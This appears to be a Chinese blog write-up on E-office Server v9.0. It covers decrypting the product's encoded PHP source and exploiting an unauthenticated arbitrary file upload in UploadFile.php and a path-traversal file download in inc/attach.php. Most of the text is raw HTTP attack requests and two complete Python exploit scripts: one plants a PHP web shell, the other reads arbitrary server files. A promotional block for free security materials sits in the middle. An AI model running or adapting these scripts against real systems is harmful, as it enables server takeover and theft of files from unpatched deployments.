漏洞影响范围 E-office Server_v9.0
默认安装位置是 d:\eoffice 在虚拟机内安装没有 D 盘,以是安装位置是 c:\eoffice
安装完成后,做事默认在 8082 端口 通过主机名 或 ip 地址都可以访问到
代码位置在 C:\eoffice\webroot 同样代码也是被加密了的
通过免费的解密网站得到了加密的详细信息 ZEND加密PHP5.2版本 http://www.phpjm.cc/
利用工具进行批量的解密,由于工具点击一次只能进行一次解密,以是利用仿照点击的工具进行仿照点击 KeymouseGo
任意文件上传漏洞漏洞利用
/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1Host: 10.0.21.14:8082Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryykJoMlQs3JMOsgi3Content-Length: 175------WebKitFormBoundaryykJoMlQs3JMOsgi3Content-Disposition: form-data; name="Filedata"; filename="1.php"<?php phpinfo();?>------WebKitFormBoundaryykJoMlQs3JMOsgi3--
上传文件的地址 http://10.0.21.14:8082/images/logo/logo-eoffice.php
漏洞剖析
漏洞的紧张位于 general/index/UploadFile.php
通过 $_GET 方法获取的参数 m,调用 UploadFile 中的任意方法
我们选择个中的 uploadPicture 方法
没有对传入的文件进行过滤,如果传入一个 php 文件,命名为 1.php 末了上传文件会变为 logo-eoffice.php 传入的位置是$_SERVER['DOCUMENT_ROOT']."/images/logo/"
【----帮助网安学习,须要网安学习资料关注我,私信回答“资料”免费获取----】① 网安学习发展路径思维导图② 60+网安经典常用工具包③ 100+SRC漏洞剖析报告④ 150+网安攻防实战技能电子书⑤ 最威信CISSP 认证考试指南+题库⑥ 超1800页CTF实战技巧手册⑦ 最新网安大厂口试题合集(含答案)⑧ APP客户端安全检测指南(安卓+IOS)
利用脚本import sysimport requestsdef request_shell(url): targeturl = url + "/images/logo/logo-eoffice.php" response = requests.get(targeturl) if(response.status_code == 200): print("获取 shell 成功,shell地址为:"+targeturl)def request_upload(url,data): targeturl = url + "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=" targetfile = {'Filedata':('upload.php',data,'text/plain')} response = requests.post(url = targeturl, files = targetfile) if(response.status_code == 200): print("上传成功") def read_uploadfile(url,filename): with open(filename) as f: data = f.read() request_upload(url,data)def upload_file(url,filename): if (filename == "phpinfo.php"): data = "<?php phpinfo(); ?>" request_upload(url,data) else: read_uploadfile(url,filename)def main(): if len(sys.argv) < 3: print("Usage: upload_file.py targeturl filename\n" "Example: python upload_file.py http://10.0.21.14:8082 phpinfo.php") exit() url = sys.argv[1] filename = sys.argv[2] upload_file(url,filename) request_shell(url)if __name__ == '__main__': main()任意文件下载漏洞漏洞利用
GET /inc/attach.php?path=/../../../../../1.txt HTTP/1.1Host: 10.0.21.14:8082Origin: http://10.0.21.14:8082User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Accept: /Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
漏洞剖析inc/attach.php
直接传入参数 $path 末了会读取 $path 的内容并将结果返回出来,我们把稳到利用未授权就可将文件下载下来,从代码层面并没有看出来缘故原由,但是通过浏览器直接访问时无法访问到,进行了 302 跳转,通过 burpsuite 就可以访问到,攥写脚本禁止 302 跳转也可以读取出来。
漏洞的紧张来源位于
我们看一下文件的下载链接
利用脚本
import sysimport requestsimport redef save_reponse(re_result,filename): filename=re.findall("[^/]+$",filename)[0] # print(filename) with open(filename, 'w',encoding='gb18030') as f: f.write(re_result)def re_response(response): re_result = response[1507:] return re_result def read_file(url,filename): targeturl = url + "/inc/attach.php?path="+filename response = requests.get(url = targeturl, allow_redirects=False) # print(response.text) re_result = re_response(response.text) print(re_result) save_reponse(re_result,filename)def main(): if len(sys.argv) < 3: print("Usage: upload_file.py targeturl filename\n" "Example: python read_file.py http://10.0.21.14:8082 attach.php") exit() url = sys.argv[1] filename = sys.argv[2] read_file(url,filename)if __name__ == '__main__': main()
还有一些 SQL 注入漏洞,还可以连续进一步的进行审计剖析。
